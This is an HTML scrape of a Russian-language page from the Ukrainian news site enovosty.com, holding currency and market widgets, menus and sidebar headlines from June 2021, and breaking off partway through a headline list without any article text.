				

				<!-- 728x90 -->
				<script type="text/javascript" id="ertqxb">
					(function(){
						var s = document.createElement("script");
						s.type = "text/javascript";
						s.src = "//randiul.com/t.js?i=z61ztncbiozypm54k16j8&cb=" + (new String(Math.random())).substring(2,8) + (((new Date()).getTime()));
						d = document.getElementById("ertqxb");
						d.parentNode.insertBefore(s, d);
					})();
				</script>
				
					
						<!-- 
			<div>
				<a rel="nofollow" href="https://www.ludinaroku.com.ua/ua/" target="_blank">
					<img src="/wp-content/uploads/2019/02/728х90_.gif">
				</a>
			</div>
			-->
		
							<!--
				<div>
					<a href="https://enovosty.com/uk/news_politics-ukr/full/2805-svobodu-ukrainskomu-politvyaznyu-kinorezhiseru-olegu-sencovu" target="_blank">
						<img src="/wp-content/uploads/2018/06/Sentsov2.jpg">
					</a>
				</div>	
				-->
									
			<div id="right_ban"></div> 
			<div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/">Укр</a></div> 		</div>    <!--end #first-banner -->
		
		<div class="cls"></div>
				
		<div id="header" style="padding-top:0px; margin-top: 0px;" >
			<div id="headerTop">
				<!-- inc cur_exchange_170 -->
				<!--<div id="weather"></div>-->
				<div class="cls"></div>
			</div>  <!-- headerTop -->
     		<!--   <hr align="center" noshade="noshade" size="1" color="#c0c0c0" style="margin: 5px 0px 5px 0px" /> -->
    		<div id="headerMiddle">
									<a href="https://enovosty.com/">
						<img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" />
					</a>
						
					
		        <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a>
				<a href="https://enovosty.com/video" class="videohead">Видео</a>
													<a class="wap" rel="nofollow" href="https://enovosty.com/news/news_incidents/full/2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video?mobile=1"></a>
					<a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/news/news_incidents/full/2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video?mobile=1">
						<img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" />Мобильная версия
					</a>
						        				<div class="wiget simple" id="curs">
		<span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a>
		</span>
	<!--<img style="display: block; margin: 0 0 10px 0;" src="https://enovosty.com/wp-content/themes/eizvestia/img/money.jpg">-->
		<div class="header-currency">
		<a href="https://enovosty.com/currency-rates">
			<table class="currency">
			  <tr class="cur_shap">
				<td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td>
			  </tr>
			  <tr>
				<td>USD</td><td>27.55</td><td>27.20</td><td>25.14</td>
			  </tr>
			  <tr class="tr_white">
				<td>EUR</td><td>33.05</td><td>32.38</td><td>27.75</td>
			  </tr>
			  <tr>
				<td>RUB</td><td>0.39</td><td>0.28</td><td>0.38</td>
			  </tr>
			</table>
		</a>
	</div>
</div>				<div class="wiget simple" id="fonds">
<span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span>
<table class="currency index">
  <tr class="cur_shap">
    <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td>
  </tr>
  <tr>
    <td>PFTS</td><td>527.44</td><td>0.01</td><td>20:36 16.04.2021</td>
  </tr>
  <tr class="tr_white">
    <td>UX</td><td>1796.39</td><td>1.43</td><td>17:00 16.04.2021</td>
  </tr>
  <tr>
    <td>RTS</td><td>1497.05</td><td>1.51</td><td>18:51 16.04.2021</td>
  </tr>
</table>
</div>
				<div class="wiget simple" id="toplivo">
<span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span>
<table class="currency benzin">
	<tr class="cur_shap">
		<td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td>
	</tr>
	<tr>
		<td style="text-align:left;padding-left: 2px;">BRENT</td><td>76.18</td><td>+0.54</td><td style="text-transform:uppercase;">Jun</td>
	</tr>
	<tr class="tr_white">
		<td style="text-align:left;padding-left: 2px;">WTI</td><td>74.00</td><td>+0.95</td><td style="text-transform:uppercase;">Jun</td>
	</tr>
	<tr>
		<td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>607.75</td><td>+0.45</td><td style="text-transform:uppercase;">Jun</td>
	</tr>
</table>
</div>    			<div id="header_right">      				
      				<a href="https://enovosty.com/rss/rss.php">RSS</a>
					<a href="https://enovosty.com/afisha" class="h-anonsy" style="margin-top: 40px;">
		        	<!-- <img src="https://enovosty.com/wp-content/themes/eizvestia/img/afisha3.png" width="56" alt="Деловая афиша" title="Деловая афиша" /> --> 
					Афиша</a>
					<a class="archive" href="https://enovosty.com/archive">Архив</a>
					<div style="clear: both;vertical-align:top;">
										  	<a href="https://enovosty.com" title="Последние новости  - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a>
						
				    </div>
    			</div><!-- header_right-->
                <div class="cls"></div>
			</div><!-- headerMiddle-->
             
			<div id="mainMenu" data-hover="hover-on-menu">
	<ul id="ull" class="menu">
					<li class="menu-item-has-children">
				<a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a>	
				<ul class="sub-menu">
					<li><a href="https://enovosty.com/news_politics">Политика</a></li>
					<li><a href="https://enovosty.com/news_kiev">Киев</a></li>
					<li><a href="https://enovosty.com/news_economy">Экономика</a></li>
					<li><a href="https://enovosty.com/news-finance">Финансы</a></li>
					<li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li>
					<li><a href="https://enovosty.com/news-markets">Рынки</a></li>
					<li><a href="https://enovosty.com/news_society">Общество</a></li>
					<li><a href="https://enovosty.com/news_abroad">Мир</a></li>
					<li><a href="https://enovosty.com/news_sport">Cпорт</a></li>
					<li><a href="https://enovosty.com/news-culture">Культура</a></li>
					<li><a href="https://enovosty.com/news-auto">Авто</a></li>
					<li class="current-menu-item"><a href="https://enovosty.com/news_incidents">Происшествия</a></li>
					<li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li>
					<li><a href="https://enovosty.com/zdorove">Здоровье</a></li>
				</ul>
			</li>
								
							<li><a href="https://enovosty.com/politika">Политика</a></li>							<li><a href="https://enovosty.com/ekonomika">Экономика</a></li>							<li><a href="https://enovosty.com/finance">Финансы</a></li>							<li><a href="https://enovosty.com/markets">Рынки</a></li>							<li><a href="https://enovosty.com/society">Общество</a></li>							<li><a href="https://enovosty.com/tehnologii">Технологии</a></li>							<li><a href="https://enovosty.com/auto">Авто</a></li>						
			<li ><a href="https://enovosty.com/blogs">Мнения</a></li>
			<li ><a href="https://enovosty.com/person">Досье</a></li>
			<li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li>
			<li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;">
				<a href="#">Ещё...</a>	
				<ul class="sub-menu">
										<li><a href="https://enovosty.com/o-proekte">О проекте</a></li>
					<li><a href="https://enovosty.com/author">Авторы</a></li>
															<li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li>
					<li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li>
					<li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li>
									</ul>
			</li>
			<li id="menu-item-4513417" ><a href="https://enovosty.com/specproekty/rynok-zemli">Рынок земли</a></li>
			<li id="menu-item-4513417" ><a href="https://enovosty.com/tag/COVID-19">COVID-19</a></li>
			
						</ul>
</div> 

<script>

jQuery(document).ready(function($){
	if(jQuery( window ).width() < 606){
		var touchHover = function() {
		$('.first').click(function(e){
			e.preventDefault();
			var $this = $(this);
			var onHover = $this.attr('data-hover');
			var linkHref = $this.attr('href');
			if (linkHref && $this.hasClass(onHover)) {
				location.href = linkHref;
				return false;
			}
			$this.toggleClass(onHover);
		});
		
		$('.finance').click(function(e){
			e.preventDefault();
			var $this = $(this);
			var onHover = $this.attr('data-hover');
			var linkHref = $this.attr('href');
			if (linkHref && $this.hasClass(onHover)) {
				location.href = linkHref;
				return false;
			}
			$this.toggleClass(onHover);
		});
		};

		$(document).ready(function() { touchHover(); });
	}

}); 

</script>			
			            	</div><!-- header-->
	             <!-- end header -->
	     


<div id="body">
	
		<div class="cls"></div>
<div id="sidebarLeft_n" style="width:210px;">		<script>
			jQuery(document).ready(function($){
				$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
								});
			});
		</script>
		<div class="topnews_single slide">
			<p style="padding: 0 7px;
			font-weight: 700;
			font-family: arial,verdana,tahoma;
			background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
			line-height: 9px;
			margin: 2px 0 9px;
			text-align: center;">
			<a href="https://enovosty.com/top-news">
			<span style="background-color: #fff;
				font-size: 12px;
				color: #326698;
				text-transform: uppercase;
				padding: 0 9px;">
			Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p>
			<ul id="slider">
				<li><ul class="tact">						<li  id="li0" style="width:210px;">
															<a href="https://enovosty.com/news/news_politics/full/2606-v-monobolshinstve-govoryat-chto-k-oseni-uberut-ne-tolko-avakova-no-i-pochti-ves-kabmin" title="В монобольшинстве говорят, что к осени уберут не только Авакова, но и почти весь Кабмин">
									<img width="210" height="156" alt="В монобольшинстве говорят, что к осени уберут не только Авакова, но и почти весь Кабмин" src="https://enovosty.com/wp-content/uploads/2021/06/kabmin.jpg">
																	</a>
																					<a href="https://enovosty.com/news/news_politics/full/2606-v-monobolshinstve-govoryat-chto-k-oseni-uberut-ne-tolko-avakova-no-i-pochti-ves-kabmin" title="В монобольшинстве говорят, что к осени уберут не только Авакова, но и почти весь Кабмин" class="name">
								В монобольшинстве говорят, что к осени уберут не только Авакова, но и почти весь Кабмин <span>(1395)</span>							</a>	
						</li>	
						</ul></li><li><ul class="tact">						<li  id="li1" style="width:210px;">
															<a href="https://enovosty.com/news/news_incidents/full/2506-sbu-razoblachila-agenta-rossijskix-specsluzhb" title="СБУ разоблачила агента российских спецслужб">
									<img width="210" height="156" alt="СБУ разоблачила агента российских спецслужб" src="https://enovosty.com/wp-content/uploads/2021/06/f9c5dfc-.jpg">
																	</a>
																					<a href="https://enovosty.com/news/news_incidents/full/2506-sbu-razoblachila-agenta-rossijskix-specsluzhb" title="СБУ разоблачила агента российских спецслужб" class="name">
								СБУ разоблачила агента российских спецслужб <span>(6748)</span>							</a>	
						</li>	
						</ul></li><li><ul class="tact">						<li  id="li2" style="width:210px;">
															<a href="https://enovosty.com/news/news_abroad/full/2606-v-avguste-zhdet-katastrofa-glava-minfina-ssha-dopustila-vozmozhnost-defolta-ssha-po-gosudarstvennomu-dolgu" title="«В августе ждет катастрофа», - Глава Минфина США допустила возможность дефолта по государственному долгу">
									<img width="210" height="156" alt="«В августе ждет катастрофа», - Глава Минфина США допустила возможность дефолта по государственному долгу" src="https://enovosty.com/wp-content/uploads/2021/06/maxresdefault-2.jpg">
																	</a>
																					<a href="https://enovosty.com/news/news_abroad/full/2606-v-avguste-zhdet-katastrofa-glava-minfina-ssha-dopustila-vozmozhnost-defolta-ssha-po-gosudarstvennomu-dolgu" title="«В августе ждет катастрофа», - Глава Минфина США допустила возможность дефолта по государственному долгу" class="name">
								«В августе ждет катастрофа», - Глава Минфина США допустила возможность дефолта по государственному долгу <span>(6996)</span>							</a>	
						</li>	
						</ul></li><li><ul class="tact">						<li  id="li3" style="width:210px;">
															<a href="https://enovosty.com/news/news_politics/full/2406-v-pentagone-podderzhivayut-reshenie-o-predstavlenii-ukraine-letalnogo-oruzhiya" title="Пентагон сделал важное заявление о летальном оружии для Украины">
									<img width="210" height="156" alt="Пентагон сделал важное заявление о летальном оружии для Украины" src="https://enovosty.com/wp-content/uploads/2021/06/original-3.jpg">
																	</a>
																					<a href="https://enovosty.com/news/news_politics/full/2406-v-pentagone-podderzhivayut-reshenie-o-predstavlenii-ukraine-letalnogo-oruzhiya" title="Пентагон сделал важное заявление о летальном оружии для Украины" class="name">
								Пентагон сделал важное заявление о летальном оружии для Украины <span>(3756)</span>							</a>	
						</li>	
						</ul></li><li><ul class="tact">						<li  id="li4" style="width:210px;">
															<a href="https://enovosty.com/news/zdorove/full/2406-moderna-pereimenovala-svoyu-vakcinu-ot-covid-19-kak-teper-budet-nazyvatsya" title="Moderna переименовала свою вакцину от COVID-19: как теперь будет называться">
									<img width="210" height="156" alt="Moderna переименовала свою вакцину от COVID-19: как теперь будет называться" src="https://enovosty.com/wp-content/uploads/2021/06/630_360_1619864825-587.jpg">
																	</a>
																					<a href="https://enovosty.com/news/zdorove/full/2406-moderna-pereimenovala-svoyu-vakcinu-ot-covid-19-kak-teper-budet-nazyvatsya" title="Moderna переименовала свою вакцину от COVID-19: как теперь будет называться" class="name">
								Moderna переименовала свою вакцину от COVID-19: как теперь будет называться <span>(2112)</span>							</a>	
						</li>	
						</ul></li><li><ul class="tact">						<li  id="li5" style="width:210px;">
															<a href="https://enovosty.com/news/news_kiev/full/2406-v-stolichnom-metro-kollaps-oplatit-proezd-prakticheski-nevozmozhno" title="В киевском метро коллапс: оплатить проезд практически невозможно">
									<img width="210" height="156" alt="В киевском метро коллапс: оплатить проезд практически невозможно" src="https://enovosty.com/wp-content/uploads/2021/06/1593237082-3918-1.jpg">
																	</a>
																					<a href="https://enovosty.com/news/news_kiev/full/2406-v-stolichnom-metro-kollaps-oplatit-proezd-prakticheski-nevozmozhno" title="В киевском метро коллапс: оплатить проезд практически невозможно" class="name">
								В киевском метро коллапс: оплатить проезд практически невозможно <span>(2348)</span>							</a>	
						</li>	
						</ul></li>			</ul>
		</div>
			
	


<div class="wiget simple_pr" id="photoPromo" style="background: #ffe3c8;">
<div class="caption"><p style="
    text-transform: uppercase;
    font-weight: 700;
    font-family: arial,verdana,tahoma;
    margin: 0;
    display: block;
    float: left;
    color: #fff;
    padding: 0 5px 0 4px;
    background-color: #f93;
    height: 17px;
    font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div>


<div class="topnews_single slide gallery2" style="width: 168px;
    height: 230px;
    padding: 10px 10px 0;
    background: #fff;
    margin: 10px;">	
	<ul id="slider_gallery2">	
	<li><ul class="tact">		<li  id="li0" style="width:168px; background-color: #fff;">
							<a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=643&pid=13682" style="height: 160px;">
					<img width="168" src="https://enovosty.com//wp-content/gallery/40e//thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Гламурные 40‑е в цвете и отличном качестве">
									</a>
									<a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=643&pid=13682" title="Гламурные 40‑е в цвете и отличном качестве" class="name" style="font-weight: normal;
			padding: 5px 3px 5px 3px;
			display: block;
			margin-left: 2px;
			font-size: 15px;
			line-height: 1.2;
			">
				Гламурные 40‑е в цвете и отличном качестве			</a>	
		</li>	
		</ul></li><li><ul class="tact">		<li  id="li1" style="width:168px; background-color: #fff;">
							<a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=642&pid=13665" style="height: 160px;">
					<img width="168" src="https://enovosty.com//wp-content/gallery/mesta_nett//thumbs/thumbs_20mestgdenasnetu-5.jpg.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Места в которых хотелось бы оказаться">
									</a>
									<a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=642&pid=13665" title="Места в которых хотелось бы оказаться" class="name" style="font-weight: normal;
			padding: 5px 3px 5px 3px;
			display: block;
			margin-left: 2px;
			font-size: 15px;
			line-height: 1.2;
			">
				Места в которых хотелось бы оказаться			</a>	
		</li>	
		</ul></li><li><ul class="tact">		<li  id="li2" style="width:168px; background-color: #fff;">
							<a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=641&pid=13642" style="height: 160px;">
					<img width="168" src="https://enovosty.com//wp-content/gallery/akva1//thumbs/thumbs_01.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Потрясающие снимки подводных пещер в Мексике">
									</a>
									<a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=641&pid=13642" title="Потрясающие снимки подводных пещер в Мексике" class="name" style="font-weight: normal;
			padding: 5px 3px 5px 3px;
			display: block;
			margin-left: 2px;
			font-size: 15px;
			line-height: 1.2;
			">
				Потрясающие снимки подводных пещер в Мексике			</a>	
		</li>	
		</ul></li><li><ul class="tact">		<li  id="li3" style="width:168px; background-color: #fff;">
							<a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=640&pid=13621" style="height: 160px;">
					<img width="168" src="https://enovosty.com/wp-content/gallery/vizual/thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Наглядные примеры визуального удовольствия">
									</a>
									<a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=640&pid=13621" title="Наглядные примеры визуального удовольствия" class="name" style="font-weight: normal;
			padding: 5px 3px 5px 3px;
			display: block;
			margin-left: 2px;
			font-size: 15px;
			line-height: 1.2;
			">
				Наглядные примеры визуального удовольствия			</a>	
		</li>	
		</ul></li>
	</ul>
</div>		
		
  <div class="cls"></div>
  <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a>
</div>

<script>
	jQuery(document).ready(function($){
		$('#slider_gallery2').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
				});
	});
</script>

<style>
.topnews_single.gallery2 div.anythingSlider-minimalist-round span.arrow {
    height:160px;
}
</style>
	<div class="wiget simple_line" style="border-color:#D6E5F2;">
					<div class="caption" style="">
									<p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Происшествия</p>
							</div>
			<div class='cls'></div><span class='news_date'>26.06.2021 г.</span><br />				<div class="post_news">
					<span id="post-4853058">
						<span class="postDate">16:19</span>
													<a class="postTitle" href="https://enovosty.com/news/news_incidents/full/2606-kamnepad-nakryval-celye-doma-poslednie-foto-i-video-yalty-posle-navodneniya">Камнепад накрывал целые дома: последние фото и видео Ялты после наводнения</a><br />
												<div class="postFields"></div>
					</span>
				</div>
							<div class="post_news">
					<span id="post-4853050">
						<span class="postDate">15:10</span>
													<a class="postTitle" href="https://enovosty.com/news/news_incidents/full/2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video">Украинская "Мрия" снесла ограждение на британской авиабазе (ВИДЕО)</a><br />
												<div class="postFields"></div>
					</span>
				</div>
							<div class="post_news">
					<span id="post-4852931">
						<span class="postDate">12:58</span>
													<a class="postTitle" href="https://enovosty.com/news/news_incidents/full/2506-na-donbasse-protivnik-uvelichil-intensivnost-primeneniya-diversionno-razvedyvatelnyx-grupp-razvedka">На Донбассе противник увеличил применение диверсионно-разведывательных групп, - разведка</a><br />
												<div class="postFields"></div>
					</span>
				</div>
							<div class="post_news">
					<span id="post-4852979">
						<span class="postDate">10:55</span>
													<a class="postTitle" href="https://enovosty.com/news/news_incidents/full/2606-kaxovskoe-vodoxranilishhe-zacvelo-i-durno-paxnet-foto-i-video">Каховское водохранилище зацвело и дурно пахнет (ФОТО и ВИДЕО)</a><br />
												<div class="postFields"></div>
					</span>
				</div>
							<div class="post_news">
					<span id="post-4852952">
						<span class="postDate">08:45</span>
													<a class="postTitle" href="https://enovosty.com/news/news_incidents/full/2506-sbu-razoblachila-agenta-rossijskix-specsluzhb">СБУ разоблачила агента российских спецслужб</a><br />
												<div class="postFields"></div>
					</span>
				</div>
							<div class="post_news">
					<span id="post-4852896">
						<span class="postDate">07:35</span>
													<a class="postTitle" href="https://enovosty.com/news/news_incidents/full/2606-dumal-proskochit-v-xarkovskoj-oblasti-mikroavtobus-popal-pod-poezd-foto-video">Думал проскочит: в Харьковской области микроавтобус попал под поезд. ФОТО , ВИДЕО</a><br />
												<div class="postFields"></div>
					</span>
				</div>
								<div class="cls"></div>
					<hr />
					<div class="cls"></div>
				<div class='cls'></div><span class='news_date'>25.06.2021 г.</span><br />				<div class="post_news">
					<span id="post-4852867">
						<span class="postDate">23:45</span>
													<a class="postTitle" href="https://enovosty.com/news/news_incidents/full/2506-v-chexii-moshhnejshij-tornado-srovnyal-s-zemlej-derevni">"Как на поле боя": в Чехии мощнейший торнадо сровнял с землей деревни (ВИДЕО)</a><br />
												<div class="postFields"></div>
					</span>
				</div>
					<div class="cls"></div>
		<a class="readMore" href="https://enovosty.com/news/news_incidents">Все происшествия</a>
	</div>
		<div class="wiget simple_line analitika"> 
			<div class="caption">
				<p style="text-transform: uppercase;
				margin: 0;
				padding: 0;
				text-align: left;
				font-size: 12px;
				font-weight: 700;
				font-family: arial,verdana,tahoma;">
				<a href="https://enovosty.com/articles">Аналитика</a></p>
			</div>
							<div class="block">
					<div class="info"><span class="postDate">25.06.2021</span>
											</div>
					<p style="margin-bottom: 3px;
						margin: 0;
						padding: 0;
						text-align: left;
						font-size: 12px;
						font-weight: 700;
						font-family: arial,verdana,tahoma;
					"><a class="postTitle" href="https://enovosty.com/politika/full/2506-incident-s-britanskim-esmincem-v-chernom-more-pochemu-kreml-xochet-sorvat-voennye-ucheniya-see-breeze-2021">Инцидент с британским эсминцем в Черном море: Почему Кремль хочет сорвать военные учения «See Breeze – 2021»</a></p>
											<div class="cblock">
							<a href="https://enovosty.com/politika/full/2506-incident-s-britanskim-esmincem-v-chernom-more-pochemu-kreml-xochet-sorvat-voennye-ucheniya-see-breeze-2021"><img width="230" alt="Инцидент с британским эсминцем в Черном море: Почему Кремль хочет сорвать военные учения «See Breeze – 2021»" src="/wp-content/uploads/2021/06/24566497-2.jpg"></a>
						</div>
										<span class="postExcerpt"><a href="https://enovosty.com/politika/full/2506-incident-s-britanskim-esmincem-v-chernom-more-pochemu-kreml-xochet-sorvat-voennye-ucheniya-see-breeze-2021">Украинско-американские учения «See Breeze - 2021», которые продлятся с 28 июня по 10 июля, должны стать самыми масштабными за 20 лет независимости страны. ...</a></span>
				</div>
							<div class="block">
					<div class="info"><span class="postDate">22.06.2021</span>
											</div>
					<p style="margin-bottom: 3px;
						margin: 0;
						padding: 0;
						text-align: left;
						font-size: 12px;
						font-weight: 700;
						font-family: arial,verdana,tahoma;
					"><a class="postTitle" href="https://enovosty.com/finance/full/2206-nulevaya-deklaraciya-ze-vlast-zagonyaet-grazhdan-strany-v-dolgovuyu-yamu">Нулевая декларация: Зе-власть загоняет граждан страны в долговую яму</a></p>
											<div class="cblock">
							<a href="https://enovosty.com/finance/full/2206-nulevaya-deklaraciya-ze-vlast-zagonyaet-grazhdan-strany-v-dolgovuyu-yamu"><img width="230" alt="Нулевая декларация: Зе-власть загоняет граждан страны в долговую яму" src="/wp-content/uploads/2021/06/nulevaya_deklaratsiya.jpg"></a>
						</div>
										<span class="postExcerpt"><a href="https://enovosty.com/finance/full/2206-nulevaya-deklaraciya-ze-vlast-zagonyaet-grazhdan-strany-v-dolgovuyu-yamu">Зе-власть окончательно "пошла по беспределу", когда руками подконтрольных народных избранников решилась на то, о чем много говорили "папередники", но ...</a></span>
				</div>
							<div class="block">
					<div class="info"><span class="postDate">19.06.2021</span>
											</div>
					<p style="margin-bottom: 3px;
						margin: 0;
						padding: 0;
						text-align: left;
						font-size: 12px;
						font-weight: 700;
						font-family: arial,verdana,tahoma;
					"><a class="postTitle" href="https://enovosty.com/finance/full/1906-obderut-na-prodazhe-kvartir-i-vydavyat-s-zemelnyx-nadelov">Обдерут на продаже квартир и выдавят с земельных наделов</a></p>
											<div class="cblock">
							<a href="https://enovosty.com/finance/full/1906-obderut-na-prodazhe-kvartir-i-vydavyat-s-zemelnyx-nadelov"><img width="230" alt="Обдерут на продаже квартир и выдавят с земельных наделов" src="/wp-content/uploads/2021/06/nalogi_zemlya.png"></a>
						</div>
										<span class="postExcerpt"><a href="https://enovosty.com/finance/full/1906-obderut-na-prodazhe-kvartir-i-vydavyat-s-zemelnyx-nadelov">Зе-власть ищет и находит все новые и новые способы сделать как можно больше гадостей рядовым гражданам. Впрочем, нерядовых это тоже касается, но их судьба ...</a></span>
				</div>
					</div>
		<div class="wiget simple_line" style="border-color:#D6E5F2;">
			<div class="caption">
						<p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/proishestviya-video">Происшествия-видео</a></p>
				
		</div>
		<div class='cls'></div><span class='news_date'>14.01.2020 г.</span><br />			<div class="post_news">
			    <span id="post-4789963">
				    <span class="postDate">14:50</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/1401-po-torgovomu-centru-v-xarkove-gulyal-lvenok-video">По торговому центру в Харькове разгуливал львенок (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>02.01.2020 г.</span><br />			<div class="post_news">
			    <span id="post-4788887">
				    <span class="postDate">15:45</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/201-v-nacpolicii-prezentovali-video-s-rezultatami-deyatelnosti-za-2019-god-video">В Нацполиции презентовали видео с результатами деятельности за 2019 год (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>12.12.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4786272">
				    <span class="postDate">20:18</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/1212-nacpoliciya-blokirovala-kanal-perepravki-migrantov-v-es">Нацполиция блокировала канал переправки нелегальных мигрантов в ЕС (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4786162">
				    <span class="postDate">12:20</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/1212-v-odnom-iz-supermarketov-xarkova-zametili-nastoyashhuyu-obezyanu-video">В одном из супермаркетов Харькова заметили настоящую обезьяну (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>05.12.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4785156">
				    <span class="postDate">16:15</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/512-nacpoliciya-zaderzhala-prestupnuyu-gruppu-vymogatelej-video">Нацполиция задержала преступную группу вымогателей (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>03.12.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4784739">
				    <span class="postDate">13:40</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/312-gde-net-lyudej-tam-zhizn-v-seti-poyavilis-unikalnye-kadry-zhivotnyx-v-chernobyle-video">"Где нет людей, там жизнь": в Сети появились уникальные кадры животных в Чернобыле (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>25.11.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4783621">
				    <span class="postDate">13:20</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/2511-nuzhdalis-v-pomoshhi-na-kievshhine-volontery-spasli-dvux-ranenyx-lebedej-video">Нуждались в помощи: на Киевщине волонтеры спасли двух раненых лебедей (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>20.11.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4782955">
				    <span class="postDate">12:00</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/2011-pilot-aviakompanii-wizz-air-pri-posadke-v-kieve-popal-v-nelovkuyu-situaciyu-video">Пилот авиакомпании Wizz Air при посадке в Киеве попал в неловкую ситуацию (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>12.11.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4781744">
				    <span class="postDate">17:48</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/1211-v-dnepre-gorit-bolnica-mechnikova-proisxodit-ekstrennaya-evakuaciya-bolnyx-video">В Днепре горит больница Мечникова: происходит экстренная эвакуация больных (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4781645">
				    <span class="postDate">09:45</span>
